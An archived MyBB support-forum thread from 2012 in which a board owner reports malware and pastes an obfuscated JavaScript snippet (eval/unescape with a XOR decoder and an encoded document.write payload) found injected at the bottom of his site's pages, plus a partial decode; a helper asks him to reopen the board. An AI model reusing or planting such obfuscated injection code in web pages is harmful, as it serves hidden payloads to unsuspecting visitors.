MyBB Community Forums

MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.6 > 1.6 General Support > MyBB caught Malware
Full Version: MyBB caught Malware
You're currently viewing a stripped down version of our content. View the full version with proper formatting.

Ricus

2012-07-29, 12:25 PM
Recently one of my members has reported me, that my website has malware. I am running it on MyBB 1.6.4 at the moment and the board URL is http://nosforum.com
Now if you view the source code, all the way on the bottom is this:
<script type="text/javascript">
eval(unescape('%66%75%6e%63%74%69%6f%6e%20%67%63%30%62%62%62%36%39%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%32%31%31%33%34%39%36%33%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%35%36%30%34%34%37%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%2d%39%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%67%63%30%62%62%62%36%39%28%27') + '%43%70%69%7e%6c%77%67%2c%7a%7b%68%42%2c%77%7f%7b%7c%45%39%31%69%7d%82%7d%79%31%74%7f%31%69%7e%77%31%78%68%76%7d%3c%68%6c%7e%7b%6a%73%7f%88%32%7f%71%7d%2f%2e%86%70%6b%78%77%47%22%3c%2d%29%75%6a%75%76%73%7b%43%2d%38%22%2c%6d%78%7f%69%69%7d%44%2d%3c%2d%28%31%4221134963%36%32%36%35%36%31%39' + unescape('%27%29%29%3b'));
</script>


I have encoded it with some tools and have received this:
			eval(unescape('function gc0bbb69(s) {
	var r = "";
	var tmp = s.split("21134963");
	s = unescape(tmp[0]);
	k = unescape(tmp[1] + "560447");
	for( var i = 0; i < s.length; i++) {
		r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+-9);
	}
	return r;
}
'));
eval(unescape('document.write(gc0bbb69('') + 'Cpi~lwg,z{hB,w{|E91i}‚}y1t1i~w1xhv}<hl~{jsˆ2q}/.†pkxwG"<-)ujuvs{C-8",mxii}D-<-(1B211349636265619' + unescape(''));'));

What is that and how do I get rid of it?

Vernier

2012-07-29, 12:28 PM
Your board is currently closed so we can't see exactly where it is.

Could you temporarily open your board so we can take a look?
MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.6 > 1.6 General Support > MyBB caught Malware